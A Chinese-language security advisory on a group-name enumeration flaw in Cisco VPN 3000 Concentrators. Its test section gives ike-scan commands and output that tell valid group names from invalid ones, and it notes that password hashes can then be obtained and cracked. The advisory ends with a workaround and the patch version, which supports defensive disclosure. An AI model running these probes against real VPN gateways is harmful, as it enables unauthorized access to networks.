受影响系统:
Cisco VPN 3000 Concentrator < 4.1.7.F
不受影响系统:
Cisco VPN 3000 Concentrator 4.1.7.F
描述:
BUGTRAQ ID: _blank>
13992Cisco VPN系列集线器由通用的远程访问虚拟专网(VPN)平台和将高可用性、高性能和可扩展性与当今最先进的加密和认证技术结合在一起的客户机软件组成,可以为专业运营商或企业用户提供服务。
Cisco VPN集线器中存在远程组名称枚举漏洞,允许攻击者使用字典程序判断集线器上有效的组名称。一旦确定了有效的组名称,攻击者就可以接着从集线器获得口令哈希值,然后再破解这个值确定组口令。
有效的组名称和口令对允许攻击者完成IKE第一阶段认证,对其他用户展开中间人攻击,最终导致非授权访问网络。
<*来源:Roy Hills (
Roy.Hills@nta-monitor.com)
链接:_blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=111928724920755&w=2*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
对有效组名称finance的响应:
$ ike-scan -A --idtype=11 -M --auth=65001 --id=finance 10.0.0.1
Starting ike-scan 1.7.2 with 1 hosts (_blank>
http://www.nta-monitor.com/ike-scan/)10.0.0.1 Aggressive Mode Handshake returned
SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=10.0.0.1)
Hash(16 bytes)
VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
VID=65963c60eacf802220adccf628738746
VID=1f07f70eaa6514d3b0fa96542a500400 (Cisco VPN Concentrator)
Ending ike-scan 1.7.2: 1 hosts scanned in 0.423 seconds (2.36 hosts/sec). 1 returned handshake;
0 returned notify
对无效组名称administration的响应:
$ ike-scan -A --idtype=11 -M --auth=65001 --id=administration 10.0.0.1
Starting ike-scan 1.7.2 with 1 hosts (_blank>
http://www.nta-monitor.com/ike-scan/)Ending ike-scan 1.7.2: 1 hosts scanned in 0.594 seconds (1.68 hosts/sec). 0 returned handshake;
0 returned notify
可见集线器只响应了有效的组名称而没有响应无效的组名称。由于这个差异,攻击者就可以判断某个组口令是否有效。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用证书认证而不是组认证。
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页将软件版本升级到4.1.7.F:
_blank>
http://www.cisco.com/warp/public/707/advisory.html
